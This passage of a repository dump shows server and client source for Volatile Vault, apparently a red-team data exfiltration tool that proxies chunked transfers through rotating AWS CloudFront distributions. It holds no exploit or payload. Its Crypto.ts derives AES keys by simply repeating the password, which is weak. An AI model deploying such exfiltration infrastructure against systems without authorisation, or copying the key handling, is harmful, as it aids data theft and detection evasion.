Api.success_from_data(res.data) as ApiGetAuthResponse; 127 | } catch (error) { 128 | return Promise.reject(Api.fail_from_error(error)); 129 | } 130 | } 131 | 132 | public async config(): Promise { 133 | try { 134 | const res = await axios.get(Api.BASE_URL + '/api/config', { 135 | headers: { 136 | Authorization: `Bearer ${this.token}`, 137 | }, 138 | responseType: 'json', 139 | }); 140 | 141 | return Api.success_from_data(res.data) as ApiConfigResponse; 142 | } catch (error) { 143 | return Promise.reject(Api.fail_from_error(error) as ApiConfigResponse); 144 | } 145 | } 146 | 147 | public saveToken() { 148 | if (!this.token) throw new Error("Can't save token; token unset!"); 149 | localStorage.setItem('token', this.token); 150 | } 151 | 152 | public getToken(): string | null { 153 | const token = localStorage.getItem('token'); 154 | if (token) 155 | this.token = token; 156 | return token; 157 | } 158 | 159 | public clearToken() { 160 | localStorage.removeItem("token"); 161 | this.token = undefined; 162 | } 163 | } 164 | -------------------------------------------------------------------------------- /client/src/utils/Config.ts: -------------------------------------------------------------------------------- 1 | export default { 2 | BASE_URL: process.env.REACT_APP_BASE_URL ?? window.location.origin, 3 | DEBUG : true//process.env.DEBUG !== undefined ?? false 4 | }; 5 | -------------------------------------------------------------------------------- /client/src/utils/Crypto.ts: -------------------------------------------------------------------------------- 1 | const makeKey = async (password: string): Promise => { 2 | const raw = new TextEncoder().encode(password); 3 | const key = new Uint8Array(32); 4 | if (raw.length < key.length) 5 | for (var i = 0; i < key.length; i++) key[i] = raw[i % raw.length]; // Pad key with repetitions of password 6 | 7 | return await crypto.subtle.importKey( 8 | 'raw', 9 | key, 10 | { 11 | name: 'AES-GCM', 12 | length: 256, 13 | }, 14 | true, 15 | ['encrypt', 'decrypt'] 16 | ); 17 | }; 18 | 19 | export const encryptSymmetric = async ( 20 | plaintext: ArrayBuffer, 21 | key: string 22 | ): Promise<[ArrayBuffer, ArrayBuffer]> => { 23 | const iv = crypto.getRandomValues(new Uint8Array(12)); 24 | const secretKey = await makeKey(key); 25 | 26 | const ciphertext = await crypto.subtle.encrypt( 27 | { 28 | name: 'AES-GCM', 29 | iv: iv, 30 | tagLength: 128, 31 | }, 32 | secretKey, 33 | plaintext 34 | ); 35 | 36 | return [ciphertext, iv.buffer]; 37 | }; 38 | 39 | export const decryptSymmetric = async ( 40 | ciphertext: ArrayBuffer, 41 | iv: ArrayBuffer, 42 | key: string 43 | ): Promise => { 44 | const secretKey = await makeKey(key); 45 | 46 | const cleartext = await crypto.subtle.decrypt( 47 | { 48 | name: 'AES-GCM', 49 | iv: iv, 50 | tagLength: 128, 51 | }, 52 | secretKey, 53 | ciphertext 54 | ); 55 | return cleartext; 56 | }; 57 | -------------------------------------------------------------------------------- /client/src/utils/Entropy.ts: -------------------------------------------------------------------------------- 1 | export const fromArrayBuffer = (data: ArrayBuffer) => 2 | fromBuffer(new Uint8Array(data)); 3 | 4 | export const fromBuffer = (data: Buffer | Uint8Array) => { 5 | const frequencies = data.reduceRight( 6 | (freq, c) => freq.set(c, freq.has(c) ? (freq.get(c) as number) + 1 : 1), 7 | new Map() 8 | ); 9 | return Array.from(frequencies.values()).reduce( 10 | (sum, f) => sum - (f / data.byteLength) * Math.log2(f / data.byteLength), 11 | 0 12 | ); 13 | }; 14 | -------------------------------------------------------------------------------- /client/src/utils/Files.ts: -------------------------------------------------------------------------------- 1 | import bytes from 'bytes'; 2 | 3 | export function calcSize(files: File[]): number { 4 | return files.reduce((n, file) => n + file.size, 0); 5 | } 6 | 7 | export function formatSize(size: number): string { 8 | return bytes.format(size, { decimalPlaces: 2 }); 9 | } 10 | -------------------------------------------------------------------------------- /client/src/utils/Snack.ts: -------------------------------------------------------------------------------- 1 | import { enqueueSnackbar } from 'notistack'; 2 | 3 | export function snackSuccess(message: string) { 4 | enqueueSnackbar({ variant: 'success', message: message }); 5 | } 6 | 7 | export function snackError(message: string) { 8 | enqueueSnackbar({ variant: 'error', message: message }); 9 | } 10 | 11 | export function snackInfo(message: string) { 12 | enqueueSnackbar({ variant: 'info', message: message }); 13 | } 14 | 15 | export function snackWarning(message: string) { 16 | enqueueSnackbar({ variant: 'warning', message: message }); 17 | } 18 | 19 | export function snack(message: string) { 20 | enqueueSnackbar({ variant: 'default', message: message }); 21 | } 22 | -------------------------------------------------------------------------------- /client/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es5", 4 | "lib": [ 5 | "dom", 6 | "dom.iterable", 7 | "esnext" 8 | ], 9 | "allowJs": true, 10 | "skipLibCheck": true, 11 | "esModuleInterop": true, 12 | "allowSyntheticDefaultImports": true, 13 | "strict": true, 14 | "forceConsistentCasingInFileNames": true, 15 | "noFallthroughCasesInSwitch": true, 16 | "module": "esnext", 17 | "moduleResolution": "node", 18 | "resolveJsonModule": true, 19 | "isolatedModules": true, 20 | "noEmit": true, 21 | "jsx": "react-jsx" 22 | }, 23 | "include": [ 24 | "src" 25 | ] 26 | } 27 | -------------------------------------------------------------------------------- /docker-compose.prod.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | web: 4 | build: . 5 | ports: 6 | - "80:${BACKEND_PORT}" 7 | restart: always 8 | env_file: .env 9 | -------------------------------------------------------------------------------- /make_test_files.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | dd if=/dev/urandom of=test1m.bin count=1 bs=1M status=progress 4 | dd if=/dev/urandom of=test10m.bin count=10 bs=1M status=progress 5 | dd if=/dev/urandom of=test100m.bin count=100 bs=1M status=progress 6 | -------------------------------------------------------------------------------- /screenshots/screenshot1-select.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/screenshots/screenshot1-select.png -------------------------------------------------------------------------------- /screenshots/screenshot2-upload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/screenshots/screenshot2-upload.png -------------------------------------------------------------------------------- /screenshots/screenshot3-download.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/screenshots/screenshot3-download.png -------------------------------------------------------------------------------- /server/.gitignore: -------------------------------------------------------------------------------- 1 | # dependencies 2 | /node_modules 3 | 4 | npm-debug.log* 5 | /files* 6 | 7 | config.yaml 8 | 9 | /logs/*.log* 10 | 11 | *.pem -------------------------------------------------------------------------------- /server/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - Server

4 |
5 |
6 | 7 | To little surprise, the server is the central and arguably most important component of Volatile Vault. While it does its best to not do anything stupid, it requires you to configure it properly. 8 | 9 | # Concept 10 | 11 | Volatile Vault allows you to mix and match plugins for file storages ("storages") and exfiltration mechanisms ("exfils") to your heart's content. Storages are plugins that store and retrieve files - this could be the server's filesystem or a cloud storage such as AWS S3. Exfils are data transports that allow you to upload and download files to and from Volatile Vault - this could be a simple built-in HTTP transport or an entirely different protocol such as QUIC. 12 | 13 | You can specify which storages and exfils to use by configuring them in (or ommitting them from) your server's configuration. 14 | 15 | # Configuration 16 | 17 | Volatile Vault uses YAML files for configuration. The server expects to find a `config.yaml` file in its root directory and will refuse to start up if it's missing or invalid. You can find a template [here](config.example.yaml). 18 | 19 | The config consists of three major parts: 20 | 21 | * **general**: The general configuration of the server, including the port its API is reachable on. 22 | * **storage**: Configurations for individual storages. 23 | * **exfil**: Configurations for individual exfils. 24 | 25 | Please refer to the individual plugins' README files for more details on their exact configuration: 26 | * Storages 27 | * [filesystem](src/extensions/storage/FileSystem/README.md) 28 | * [awss3](src/extensions/storage/AwsS3/README.md) 29 | * Exfils 30 | * [basichttp](src/extensions/exfil/BasicHttp/README.md) 31 | * [awscloudfront](src/extensions/exfil/AwsCloudFront/README.md) 32 | 33 | At this time there can only be a single instance of each plugin active and configured at a time. This means that you can for example configure both basichttp and awscloudfront exfils, but you can not configure to use two instances of basichttp. -------------------------------------------------------------------------------- /server/config.example.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | general: 3 | port: 8888 4 | totp_secret: '' 5 | jwt_expiry: 60 6 | storage: 7 | filesystem: 8 | folder: './files_basic' 9 | max_size: 104857600 10 | file_expiry: 60 11 | exfil: 12 | basichttp: 13 | max_total_size: 104857600 14 | hosts: 15 | - 'https://my.cool.site' 16 | awscloudfront: 17 | access_key_id: '' 18 | secret_access_key: '' 19 | region: '' 20 | distribution_tag: 'volatilevault' 21 | domain: my.cool.site 22 | folder: './files_aws' 23 | chunk_size: 1000000 24 | max_total_size: 10000000 25 | upload: 26 | mode: 'Static' 27 | max_duration: 5 28 | hosts: 29 | - '.cloudfront.net' 30 | - '.cloudfront.net' 31 | - '.cloudfront.net' 32 | - '.cloudfront.net' 33 | - '.cloudfront.net' 34 | - '.cloudfront.net' 35 | - '.cloudfront.net' 36 | - '.cloudfront.net' 37 | - '.cloudfront.net' 38 | - '.cloudfront.net' 39 | download: 40 | mode: 'Dynamic' 41 | max_duration: 15 42 | max_dynamic_hosts: 10 43 | -------------------------------------------------------------------------------- /server/logs/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/server/logs/.gitkeep -------------------------------------------------------------------------------- /server/nodemon.json: -------------------------------------------------------------------------------- 1 | { 2 | "ignore": [ 3 | ".git", 4 | "node_modules", 5 | "dist" 6 | ], 7 | "watch": [ 8 | "./src" 9 | ], 10 | "exec": "npm start", 11 | "ext": "ts" 12 | } -------------------------------------------------------------------------------- /server/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "node-react-docker-compose", 3 | "version": "1.0.0", 4 | "description": "A reference for running a node server and create-react-app app via docker-compose.", 5 | "main": "src/index.js", 6 | "scripts": { 7 | "start": "ts-node ./src/server.ts", 8 | "start:prod": "npm run build && node ./dist/src/server.js", 9 | "start:nodemon": "npx nodemon ./src/server.ts", 10 | "build": "npx tsc" 11 | }, 12 | "author": "Peter Coles", 13 | "license": "MIT", 14 | "dependencies": { 15 | "@aws-sdk/client-cloudfront": "^3.606.0", 16 | "@aws-sdk/client-s3": "^3.608.0", 17 | "@aws-sdk/lib-storage": "^3.614.0", 18 | "@aws-sdk/s3-request-presigner": "^3.608.0", 19 | "@types/multistream": "^4.1.3", 20 | "@types/node-cron": "^3.0.11", 21 | "ajv": "^8.12.0", 22 | "body-parser": "^1.20.2", 23 | "cors": "^2.8.5", 24 | "dotenv": "^16.4.1", 25 | "express": "^4.17.1", 26 | "express-jwt": "^8.4.1", 27 | "moment": "^2.30.1", 28 | "multistream": "^4.1.0", 29 | "nocache": "^4.0.0", 30 | "node-cron": "^3.0.3", 31 | "otpauth": "^9.2.2", 32 | "short-unique-id": "^5.0.3", 33 | "ts-json-schema-generator": "^2.0.1", 34 | "winston": "^3.13.0", 35 | "yaml": "^2.4.1" 36 | }, 37 | "devDependencies": { 38 | "@types/express": "^4.17.21", 39 | "@types/node": "^20.11.16", 40 | "nodemon": "^3.0.3", 41 | "ts-node": "^10.9.2", 42 | "typescript": "^5.3.3" 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /server/src/config/config.ts: -------------------------------------------------------------------------------- 1 | export interface Config { 2 | general: General; 3 | storage: Storage; 4 | exfil: Exfil; 5 | } 6 | 7 | export interface General { 8 | port: number; 9 | totp_secret: string; 10 | jwt_expiry: number; 11 | } 12 | 13 | export interface Storage { 14 | filesystem?: StorageFileSystem; 15 | awss3?: StorageAwsS3; 16 | } 17 | 18 | export interface BaseStorage { 19 | file_expiry: number; 20 | max_size: number; 21 | } 22 | 23 | export interface StorageFileSystem extends BaseStorage { 24 | folder: string; 25 | } 26 | 27 | export interface Exfil { 28 | basichttp?: ExfilBasicHTTP; 29 | awscloudfront?: ExfilAwsCloudFront; 30 | } 31 | 32 | export interface BaseExfil { 33 | max_total_size?: number; 34 | chunk_size?: number; 35 | } 36 | 37 | export interface ExfilBasicHTTP extends BaseExfil { 38 | hosts: string[]; 39 | } 40 | 41 | export interface BaseAwsSettings { 42 | access_key_id: string; 43 | secret_access_key: string; 44 | region: string; 45 | } 46 | 47 | export type TransferMode = 'Dynamic' | 'Static'; 48 | 49 | export interface TransferConfig { 50 | mode: TransferMode; 51 | hosts?: string[]; 52 | max_dynamic_hosts?: number; 53 | max_duration: number; 54 | } 55 | 56 | export interface ExfilAwsCloudFront extends BaseExfil, BaseAwsSettings { 57 | distribution_tag: string; 58 | domain: string; 59 | folder: string; 60 | upload: TransferConfig; 61 | download: TransferConfig; 62 | } 63 | 64 | export interface StorageAwsS3 extends BaseStorage, BaseAwsSettings { 65 | bucket: string; 66 | generate_presigned_urls: boolean; 67 | user_arn: string; 68 | } 69 | -------------------------------------------------------------------------------- /server/src/config/instance.ts: -------------------------------------------------------------------------------- 1 | import { Config } from './config'; 2 | import { load } from './util'; 3 | 4 | export class ConfigInstance { 5 | private static config: Config | null = null; 6 | 7 | public static get Inst() { 8 | if (ConfigInstance.config === null) { 9 | throw new Error('ConfigInstance uninitialized'); 10 | } 11 | return ConfigInstance.config; 12 | } 13 | 14 | public static async init(): Promise { 15 | ConfigInstance.config = await load(); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /server/src/config/util.ts: -------------------------------------------------------------------------------- 1 | import { createGenerator } from "ts-json-schema-generator"; 2 | import { Config } from "./config"; 3 | import path from 'path'; 4 | import Ajv from 'ajv'; 5 | import fs, { constants } from 'fs/promises'; 6 | import { parse } from 'yaml' 7 | 8 | 9 | export const load = async () : Promise => { 10 | const root = process.cwd(); 11 | 12 | // Read YAML 13 | const cfgPath = path.join(root, "config.yaml"); 14 | try { 15 | await fs.access(cfgPath, constants.R_OK | constants.W_OK); 16 | } catch (error) { 17 | throw new Error(`Failed to access config at ${cfgPath}`) 18 | } 19 | 20 | const cfgYaml = await fs.readFile(cfgPath, {encoding: "utf8"}) 21 | // Parse YAML 22 | const cfg = parse(cfgYaml) 23 | 24 | // Generate schema from source 25 | const schema = createGenerator({ 26 | path: path.join(root, "src", "config", "config.ts"), 27 | tsconfig: path.join(root, "tsconfig.json"), 28 | type: "Config" 29 | }).createSchema("Config"); 30 | 31 | // Validate YAML against schema 32 | const validate = new Ajv().compile(schema); 33 | if (!validate(cfg)) { 34 | const msg = validate.errors[0].message ?? "YAML error"; 35 | const path = validate.errors[0].instancePath; 36 | throw new Error(`${path}: ${msg}`) 37 | } 38 | return cfg as Config 39 | } -------------------------------------------------------------------------------- /server/src/extensions/exfil/AwsCloudFront/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - AwsCloundFront Exfil

4 |
5 |
6 | 7 | This exfil allows Volatile Vault to use AWS CloudFront distributions for proxying chunks of data transfers. 8 | 9 | # Configuration 10 | 11 | Example: 12 | 13 | ```yaml 14 | --- 15 | exfil: 16 | awscloudfront: 17 | access_key_id: '' 18 | secret_access_key: '' 19 | region: '' 20 | distribution_tag: 'volatilevault' 21 | domain: my.cool.site 22 | folder: './files_aws' 23 | chunk_size: 1000000 24 | max_total_size: 10000000 25 | upload: 26 | mode: 'Static' 27 | max_duration: 5 28 | hosts: 29 | - '.cloudfront.net' 30 | - '.cloudfront.net' 31 | - '.cloudfront.net' 32 | - '.cloudfront.net' 33 | - '.cloudfront.net' 34 | - '.cloudfront.net' 35 | - '.cloudfront.net' 36 | - '.cloudfront.net' 37 | - '.cloudfront.net' 38 | - '.cloudfront.net' 39 | download: 40 | mode: 'Dynamic' 41 | max_duration: 15 42 | max_dynamic_hosts: 10 43 | ``` 44 | 45 | Fields: 46 | 47 | - `access_key_id`: AWS IAM access key to use for authentication. 48 | - `secret_access_key`: AWS IAM secret access key to use for authentication. 49 | - `region`: AWS region to use when registering new distributions. 50 | - `distribution_tag`: Tag to apply to distributions so they can be associated with this VV instance. 51 | - `domain`: Target domain to proxy traffic to - your VV server should run here. 52 | - `folder`: Absolute or relative path to a folder to temporarily store chunks for uploads/downloads in. 53 | - `chunk_size`: Maximum amount of bytes transferred per chunk. Used to calculate the number of distributions to register (in `Dynamic` mode). Example: `chunk_size: 10` will result in `5` distributions being spawned when uploading a file of `45` bytes. 54 | - `max_total_size`: Maximum allowed size of a single data transfer (upload or download). 55 | - `upload`/`download`: Configuration for file uploads and downloads, respectively: 56 | - `mode`: Either `Dynamic` or `Static` 57 | - `Dynamic`: AWS CloudFront distributions are registered and deployed dynamically. While this supplies you with fresh distributions for each file transfer, it can take some time for them to deploy. Requires you to specify `max_duration`. 58 | - `Static`: Predefined AWS CloudFront distributions are used for proxying data transfers. In this mode you will re-use the predefined distributions but they're instantly available. Requires you to specify `hosts`. 59 | - `max_duration`: Maximum duration (in minutes) that initialized transfers may take to complete before their temporary files are removed. 60 | - `max_dynamic_hosts`: Maximum number of distributions to register for a single transfer. Set to `0` to ignore this parameter and register distributions solely based on the size of the data being transferred (see `chunk_size`). 61 | - `hosts`: List of pre-registered and deployed AWS CloudFront distributions to use in `Static` mode. 62 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/AwsCloudFront/awscloudfront.ts: -------------------------------------------------------------------------------- 1 | import bodyParser from 'body-parser'; 2 | import express, { Express, Request, Response } from 'express'; 3 | import { Readable } from 'node:stream'; 4 | import path from 'path'; 5 | import ShortUniqueId from 'short-unique-id'; 6 | import winston from 'winston'; 7 | import { 8 | Config, 9 | ExfilAwsCloudFront, 10 | TransferConfig, 11 | } from '../../../config/config'; 12 | import { FsUtils } from '../../../fs'; 13 | import { Logger } from '../../../logging'; 14 | import { readFixedChunks } from '../../../streams'; 15 | import { 16 | BaseExtension, 17 | ExtensionInfo, 18 | FileUploadInformation, 19 | } from '../../extension'; 20 | import { ExtensionRepository } from '../../repository'; 21 | import { CloudFrontWrapper } from './wrapper'; 22 | import { 23 | BinaryData, 24 | ExfilProvider, 25 | ExfilProviderCapabilities, 26 | FileInformation, 27 | } from '../provider'; 28 | import cron from 'node-cron'; 29 | import MultiStream from 'multistream'; 30 | import moment from 'moment'; 31 | 32 | interface ChunkData { 33 | chunkId: number; 34 | fileId: string | null; 35 | done: boolean; 36 | } 37 | interface TransferData { 38 | id: string; 39 | total_size: number; 40 | storage: string; 41 | hosts: string[]; 42 | creation: Date; 43 | fs: FsUtils; 44 | } 45 | 46 | interface DownloadTransferData extends TransferData { 47 | chunks: ChunkData[]; 48 | } 49 | 50 | interface UploadTransferData extends TransferData { 51 | chunks: ChunkData[]; 52 | } 53 | 54 | const TRANSFER_IDS = new ShortUniqueId({ 55 | length: 16, 56 | dictionary: 'alpha_upper', 57 | }); 58 | 59 | export class AwsCloudFrontExfilProvider 60 | extends BaseExtension 61 | implements ExfilProvider 62 | { 63 | private static NAME: string = 'awscloudfront'; 64 | private logger: winston.Logger; 65 | private client: CloudFrontWrapper; 66 | private uploads: UploadTransferData[]; 67 | private downloads: DownloadTransferData[]; 68 | private fs: FsUtils; 69 | private staticDownloadIdx: number; 70 | private staticUploadIdx: number; 71 | 72 | public get max_total_size(): number { 73 | return this.config.max_total_size ?? 100 * 1024 * 1024; // Default to 100MB 74 | } 75 | 76 | public get chunk_size(): number { 77 | return this.config.chunk_size ?? 10 * 1024 * 1024; // Default to 10MB 78 | } 79 | 80 | public constructor() { 81 | super(AwsCloudFrontExfilProvider.NAME, [ 82 | 'DownloadChunked', 83 | 'UploadChunked', 84 | ]); 85 | this.logger = Logger.Instance.createChildLogger('AwsCloudFront'); 86 | this.uploads = []; 87 | this.downloads = []; 88 | this.fs = new FsUtils(AwsCloudFrontExfilProvider.NAME); 89 | this.staticDownloadIdx = 0; 90 | this.staticUploadIdx = 0; 91 | } 92 | 93 | get config(): ExfilAwsCloudFront { 94 | return this.cfg.exfil.awscloudfront; 95 | } 96 | 97 | get clientConfig(): ExtensionInfo { 98 | return { 99 | name: AwsCloudFrontExfilProvider.NAME, 100 | displayName: 'AWS CloudFront', 101 | info: { 102 | max_total_size: this.config.max_total_size, 103 | chunk_size: this.config.chunk_size, 104 | upload: { 105 | mode: this.config.upload.mode, 106 | hosts: this.config.upload.hosts, 107 | }, 108 | download: { 109 | mode: this.config.download.mode, 110 | hosts: this.config.download.hosts, 111 | }, 112 | }, 113 | }; 114 | } 115 | 116 | public override async installCron(): Promise { 117 | cron.schedule('0 * * * * *', () => { 118 | for (const download of this.downloads) 119 | download.fs.cleanup(1000 * 60 * this.config.download.max_duration); 120 | 121 | for (const upload of this.uploads) 122 | upload.fs.cleanup(1000 * 60 * this.config.upload.max_duration); 123 | 124 | const now = moment(); 125 | const expired = ( 126 | transfer: TransferData, 127 | minutes: number, 128 | removeHosts: boolean 129 | ): boolean => { 130 | const _expired = 131 | moment.duration(now.diff(moment(transfer.creation))).asMinutes() >= 132 | minutes; 133 | 134 | if (_expired) { 135 | this.logger.info(`Removing expired transfer ${transfer.id}`); 136 | if (removeHosts) this.client.releaseDistributions(transfer.id); 137 | } 138 | return _expired; 139 | }; 140 | 141 | this.downloads = this.downloads.filter( 142 | (download) => 143 | !expired( 144 | download, 145 | this.config.download.max_duration, 146 | this.config.download.mode == 'Dynamic' 147 | ) 148 | ); 149 | this.uploads = this.uploads.filter( 150 | (upload) => 151 | !expired( 152 | upload, 153 | this.config.upload.max_duration, 154 | this.config.upload.mode == 'Dynamic' 155 | ) 156 | ); 157 | }); 158 | return Promise.resolve(); 159 | } 160 | 161 | private validateTransferConfig( 162 | config: TransferConfig, 163 | transfer: 'Download' | 'Upload' 164 | ): boolean { 165 | if (config.mode == 'Dynamic' && config.max_dynamic_hosts === undefined) { 166 | this.logger.error( 167 | `${transfer} configured as dynamic but no max dynamic hosts set` 168 | ); 169 | return false; 170 | } 171 | if ( 172 | config.mode == 'Static' && 173 | (config.hosts === undefined || !config.hosts?.length) 174 | ) { 175 | this.logger.error( 176 | `${transfer} configured as static but no hosts defined` 177 | ); 178 | return false; 179 | } 180 | return true; 181 | } 182 | 183 | async init(cfg: Config): Promise { 184 | this.cfg = cfg; 185 | if (this.config) { 186 | await this.fs.init(this.config.folder); 187 | 188 | this.logger.debug('Validating configuration...'); 189 | if ( 190 | !this.validateTransferConfig(this.config.download, 'Download') || 191 | !this.validateTransferConfig(this.config.upload, 'Upload') 192 | ) { 193 | this.state = 'InitializationError'; 194 | return; 195 | } 196 | 197 | this.logger.debug('Initializing CloudFront client...'); 198 | this.client = new CloudFrontWrapper( 199 | this.config.access_key_id, 200 | this.config.secret_access_key, 201 | this.config.region, 202 | this.config.distribution_tag, 203 | this.config.domain 204 | ); 205 | 206 | this.logger.debug('Validating credentials...'); 207 | 208 | if ((await this.client.validateCredentials()) == false) { 209 | this.state = 'InitializationError'; 210 | return; 211 | } 212 | 213 | this.logger.info('Initialized & validated credentials'); 214 | await this.client.getCachePolicyId(); 215 | this.register(); 216 | this.state = 'Initialized'; 217 | } else { 218 | this.logger.debug('Config not set'); 219 | this.state = 'Unconfigured'; 220 | } 221 | } 222 | 223 | protected register() { 224 | ExtensionRepository.getInstance().registerExfil(this); 225 | } 226 | 227 | get hosts(): Promise { 228 | const staticUploads = this.config.upload.hosts ?? []; 229 | const staticDownloads = this.config.download.hosts ?? []; 230 | const assignedUploads = this.uploads.map((u) => u.hosts).flat(); 231 | const assignedDownloads = this.downloads.map((u) => u.hosts).flat(); 232 | return Promise.resolve( 233 | staticUploads 234 | .concat(staticDownloads) 235 | .concat(assignedUploads) 236 | .concat(assignedDownloads) 237 | ); 238 | } 239 | 240 | async installRoutes(app: Express): Promise { 241 | // Kick-off a chunked upload: allocate domains 242 | const initChunkUpload = express.Router(); 243 | initChunkUpload.post( 244 | `/api/${AwsCloudFrontExfilProvider.NAME}/initupload/:storage/:size`, 245 | async (req: Request, res: Response) => { 246 | this.logger.info( 247 | `InitChunkUpload request to ${req.params?.storage ?? 'n/a'} for ${ 248 | req.params?.size ?? 'n/a' 249 | } bytes from ${req.ip}` 250 | ); 251 | 252 | try { 253 | // Validate storage param 254 | const storageName = req.params?.storage; 255 | if (!storageName) throw new Error('Missing storage'); 256 | 257 | const size = parseInt(req.params?.size); 258 | if (Number.isNaN(size) || size <= 0) throw new Error('Invalid size'); 259 | if (size > this.max_total_size) 260 | throw new Error('Maximum file size exceeded'); 261 | 262 | // Validate that storage exists 263 | const storage = 264 | ExtensionRepository.getInstance().getStorage(storageName); 265 | const transferId = await this.initChunkUpload(storageName, size); 266 | const transferData = this.uploads.find((t) => t.id === transferId); 267 | 268 | return res.json({ 269 | message: 'Initialization successful', 270 | hosts: transferData.hosts, 271 | chunks: transferData.chunks.length, 272 | size: size, 273 | id: transferData.id, 274 | }); 275 | } catch (error) { 276 | this.logger.error( 277 | `Error: ${error?.message ?? JSON.stringify(error)}` 278 | ); 279 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 280 | } 281 | } 282 | ); 283 | app.use(initChunkUpload); 284 | 285 | // Get deployment status of domains used for specific transfer 286 | const transferStatus = express.Router(); 287 | transferStatus.get( 288 | `/api/${AwsCloudFrontExfilProvider.NAME}/status/:transferId`, 289 | async (req: Request, res: Response) => { 290 | this.logger.info( 291 | `Transfer status request for ${ 292 | req.params?.transferId ?? 'n/a' 293 | } from ${req.ip}` 294 | ); 295 | 296 | try { 297 | // Validate param 298 | const transferId = req.params?.transferId; 299 | if (!transferId) throw new Error(`Invalid transfer ${transferId}`); 300 | const upload = this.uploads.find((t) => t.id === transferId); 301 | const download = this.downloads.find((t) => t.id === transferId); 302 | if (!upload && !download) 303 | throw new Error(`Unknown transfer ${transferId}`); 304 | 305 | const status = 306 | (upload && this.config.upload.mode == 'Static') || 307 | (download && this.config.download.mode == 'Static') 308 | ? true 309 | : await this.client.areDistributionsReady(transferId); 310 | 311 | return res.json({ message: 'Request successful', status }); 312 | } catch (error) { 313 | this.logger.error( 314 | `Error: ${error?.message ?? JSON.stringify(error)}` 315 | ); 316 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 317 | } 318 | } 319 | ); 320 | app.use(transferStatus); 321 | 322 | // Upload a single chunk 323 | const chunkedUpload = express.Router(); 324 | chunkedUpload.use( 325 | bodyParser.raw({ 326 | limit: this.chunk_size, 327 | type: 'application/octet-stream', 328 | }) 329 | ); 330 | 331 | chunkedUpload.use((error, req, res, next) => { 332 | if (error) { 333 | return res.status(413).json({ message: 'Data exceeds size limit' }); 334 | } 335 | next(error); 336 | }); 337 | 338 | chunkedUpload.post( 339 | `/api/${AwsCloudFrontExfilProvider.NAME}/upload/:transferId/chunk/:chunkNo`, 340 | async (req: Request, res: Response) => { 341 | try { 342 | this.logger.info( 343 | `Upload request for ${req.params?.transferId ?? 'n/a'} chunk # ${ 344 | req.params?.chunkNo ?? 'n/a' 345 | } from ${req.ip}` 346 | ); 347 | 348 | const body = req.body as Buffer; 349 | if (!body || !body.length) throw new Error('Missing body'); 350 | 351 | const transferId = req.params?.transferId; 352 | if (!transferId) throw new Error(`Invalid transfer ${transferId}`); 353 | if (!this.uploads.find((t) => t.id === transferId)) 354 | throw new Error(`Unknown transfer ${transferId}`); 355 | 356 | const chunkNo = parseInt(req.params?.chunkNo); 357 | if (Number.isNaN(chunkNo)) 358 | throw new Error(`Invalid chunk number ${transferId}`); 359 | 360 | const result = await this.uploadChunk(transferId, chunkNo, { 361 | stream: Readable.from(body), 362 | size: body.length, 363 | }); 364 | 365 | return res.json({ message: 'Chunk uploaded', ...result }); 366 | } catch (error) { 367 | this.logger.error( 368 | `Error: ${error?.message ?? JSON.stringify(error)}` 369 | ); 370 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 371 | } 372 | } 373 | ); 374 | app.use(chunkedUpload); 375 | 376 | // Kick-off a chunked download 377 | const initChunkDownload = express.Router(); 378 | initChunkDownload.post( 379 | `/api/${AwsCloudFrontExfilProvider.NAME}/initdownload/:id`, 380 | async (req: Request, res: Response) => { 381 | this.logger.info( 382 | `InitChunkDownload request for ${req.params?.id ?? 'n/a'} from ${ 383 | req.ip 384 | }` 385 | ); 386 | 387 | try { 388 | // Validate file id param 389 | const id = req.params?.id; 390 | if (!id) throw new Error('Missing id'); 391 | 392 | const transferId = await this.initChunkDownload({ id: id }); 393 | const transferData = this.downloads.find((d) => d.id == transferId); 394 | 395 | return res.json({ 396 | message: 'Initialization successful', 397 | hosts: transferData.hosts, 398 | chunks: transferData.chunks.length, 399 | size: transferData.total_size, 400 | id: transferData.id, 401 | }); 402 | } catch (error) { 403 | this.logger.error( 404 | `Error: ${error?.message ?? JSON.stringify(error)}` 405 | ); 406 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 407 | } 408 | } 409 | ); 410 | app.use(initChunkDownload); 411 | 412 | // Download a single chunk 413 | const chunkedDownload = express.Router(); 414 | chunkedDownload.get( 415 | `/api/${AwsCloudFrontExfilProvider.NAME}/download/:transferId/chunk/:chunkNo`, 416 | async (req: Request, res: Response) => { 417 | this.logger.info( 418 | `Download request for ${req.params?.transferId ?? 'n/a'} chunk # ${ 419 | req.params?.chunkNo ?? 'n/a' 420 | } from ${req.ip}` 421 | ); 422 | 423 | try { 424 | const transferId = req.params?.transferId; 425 | if (!transferId) throw new Error(`Invalid transfer ${transferId}`); 426 | if (!this.downloads.find((t) => t.id === transferId)) 427 | throw new Error(`Unknown transfer ${transferId}`); 428 | 429 | const chunkNo = parseInt(req.params?.chunkNo); 430 | if (Number.isNaN(chunkNo)) 431 | throw new Error(`Invalid chunk number ${transferId}`); 432 | 433 | const data = await this.downloadChunk(transferId, chunkNo); 434 | 435 | // Send 436 | res.writeHead(200, { 437 | 'Content-Type': 'application/octet-stream', 438 | 'Content-Length': data.size.toString(), 439 | }); 440 | 441 | for await (const chunk of data.stream) res.write(chunk, 'binary'); 442 | 443 | res.end(); 444 | } catch (error) { 445 | this.logger.error( 446 | `Error: ${error?.message ?? 